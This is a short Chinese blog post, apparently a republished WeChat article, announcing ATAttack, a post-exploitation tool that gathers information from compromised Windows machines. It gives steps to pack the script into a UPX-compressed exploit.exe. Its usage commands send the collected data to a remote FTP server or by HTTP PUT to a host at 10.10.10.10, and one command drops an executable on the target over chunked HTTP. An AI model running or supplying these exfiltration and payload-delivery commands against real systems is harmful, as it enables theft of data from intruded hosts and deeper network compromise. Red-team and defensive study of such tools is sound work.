0x01 前言
每获取一台机器权限,如果每次都手动操作重复一样的信息收集工作,无疑加大了工作量,既为了能更好的获取内网进一步突破点攻击面,这段闲暇时间造了个简易的轮子,其在真实环境中发现较多未知问题,欢迎大家踊跃提交 issue 和 PR !
0x02 简介
0x03 打包ATAttack二进制文件
Python 2.7.15PyInstaller 3.4Windows 10
下载UPX(测试环境为upx-3.95-win64版本)https://github.com/upx/upx/releasespip安装pyinstallerpip install pyinstaller进入ATAttack目录,并通过upx压缩pyinstaller -F exploit.py --upx-dir=upx-3.95-win64成功打包二进制控制台单文件\ATAttack\dist]\exploit.exe
0x04 快照预览
Win10测试环境
0x05 使用方法
存储于本地临时文件夹:
python exploit.py回传远程FTP服务器:
python exploit.py -t ftp_host -u ftp_user -p ftp_pwd通过PUT请求回传http服务端
python exploit.py -d http://10.10.10.10:8000/HTTP分块传输落地可执行文件
python http_client.py -d http://10.10.10.10./exploit.exe -u http://10.10.10.10:8000/0x06 获取方式
阅读原文即可获取项目地址
点击下方名片回复"20221109"获取
文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247494676&idx=1&sn=3e1bce8cb2feeff1d0b053ebd3838e09&chksm=ea34134edd439a585e37692cbcb101bf73ec04cab8618d23a363bd92aa04537d7d4afae7e224#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh